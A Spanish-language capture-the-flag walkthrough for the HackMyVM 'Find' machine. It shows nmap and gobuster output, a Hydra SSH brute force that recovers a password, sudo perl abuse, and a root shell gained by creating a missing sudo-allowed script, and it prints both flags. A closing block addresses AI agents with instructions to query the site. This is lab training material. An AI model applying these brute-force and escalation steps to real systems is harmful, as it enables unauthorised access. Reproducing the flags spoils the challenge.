# Find HackMyVM (Easy - Linux) ## Escaneo de puertos ```shell nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn ``` ```shell nmap -sCV -p ``` Info: ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-24 03:15 EDT Nmap scan report for 192.168.5.28 Host is up (0.00062s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA) | 256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA) |_ 256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.38 (Debian) MAC Address: 08:00:27:17:13:3F (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds ``` Veremos que hay un puerto `80` en el que contendra una pagina web, si entramos veremos simplemente una pagina web por defecto de `apache2` por lo que vamos a realizar un poco de `fuzzing` a ver que encontramos. ## Gobuster ```shell gobuster dir -u http:/// -w -x html,php,txt -t 50 -k -r ``` Info: ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.5.28/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,php,txt [+] Follow Redirect: true [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.html (Status: 403) [Size: 277] /index.html (Status: 200) [Size: 10701] /manual (Status: 200) [Size: 626] /robots.txt (Status: 200) [Size: 13] /.html (Status: 403) [Size: 277] Progress: 312820 / 882244 (35.46%)^C [!] Keyboard interrupt detected, terminating. Progress: 313164 / 882244 (35.50%) =============================================================== Finished =============================================================== ``` Pero no veremos gran cosa, vamos a probar con las extensiones a ver si encontramos algo. ## Escalate user missyred ```shell gobuster dir -u http:/// -w -x html,php,txt,jpg,png -t 50 -k -r ``` Info: ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.5.28/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,jpg,png,html,php [+] Follow Redirect: true [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.html (Status: 403) [Size: 277] /index.html (Status: 200) [Size: 10701] /cat.jpg (Status: 200) [Size: 35137] /manual (Status: 200) [Size: 626] /robots.txt (Status: 200) [Size: 13] /.html (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] Progress: 1323360 / 1323366 (100.00%) =============================================================== Finished =============================================================== ``` Veremos que si probamos con dichas extensiones enseguida vamos a ver algo bastante interesante llamado `cat.jpg`, vamos a ver que contiene por lo que nos lo vamos a descargar. ```shell curl -O http:///cat.jpg ``` Si leemos la imagen a lo ultimo del contenido veremos esto que no parece que sea de la imagen, parece que sea algo puesto a mano. ``` >C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy Codigo decodificado ``` missyred ``` Vemos que nos da un usuario por lo que vamos a probar a tirarle `fuerza bruta` a ver que encontramos. ### Hydra ```shell hydra -l missyred -P ssh:// -t 64 -I ``` Info: ``` Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-24 03:44:20 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task [DATA] attacking ssh://192.168.5.28:22/ [22][ssh] host: 192.168.5.28 login: missyred password: iloveyou 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 21 final worker threads did not complete until end. [ERROR] 21 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-24 03:44:27 ``` Veremos que hemos encontrados una credenciales las cuales vamos a probar por `SSH` a ver si funcionan. ### SSH ```shell ssh missyred@ ``` Metemos como contraseƱa `iloveyou` y veremos que estamos dentro. ## Escalate user kings Si hacemos `sudo -l` veremos lo siguiente: ``` Matching Defaults entries for missyred on find: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User missyred may run the following commands on find: (kings) /usr/bin/perl ``` Veremos que podremos ejecutar el binario `perl` como el usuario `kings` por lo que haremos lo siguiente: ```shell sudo -u kings perl -e 'exec "/bin/bash";' ``` Info: ``` kings@find:/home/missyred$ whoami kings ``` Vamos a leer la `flag` del usuario. > user.txt ``` f4e690f638c01bd8a19fb1349d40519c ``` ## Escalate Privileges Si hacemos `sudo -l` veremos lo siguiente: ``` Matching Defaults entries for kings on find: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User kings may run the following commands on find: (ALL) NOPASSWD: /opt/boom/boom.sh ``` Veremos que podemos ejecutar el script de `/opt` como el usuario `root` vamos a ver que permisos tiene o que contiene dicho script. Si nos vamos a la carpeta `/opt` veremos que no hay nada, por lo que podremos realizar lo siguiente para ser el usuario `root`. ```shell mkdir /opt/boom cd /opt/boom nano /opt/boom/boom.sh #Dentro del nano #!/bin/bash echo "Obtieniendo una shell como root..." /bin/bash ``` Ahora le establecemos los permisos necesarios de ejecuccion. ```shell chmod +x /opt/boom/boom.sh ``` Ahora vamos a ejecutarlo de la siguiente forma: ```shell sudo /opt/boom/boom.sh ``` Info: ``` Obtieniendo una shell como root... root@find:/opt/boom# whoami root ``` Con esto veremos que ya seremos `root` por lo que vamos a leer la `flag` de `root`. > root.txt ``` c8aaf0f3189e000006c305bbfcbeb790 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dise0.gitbook.io/h4cker_b00k/ctf/hackmyvm/find-hackmyvm-easy-linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.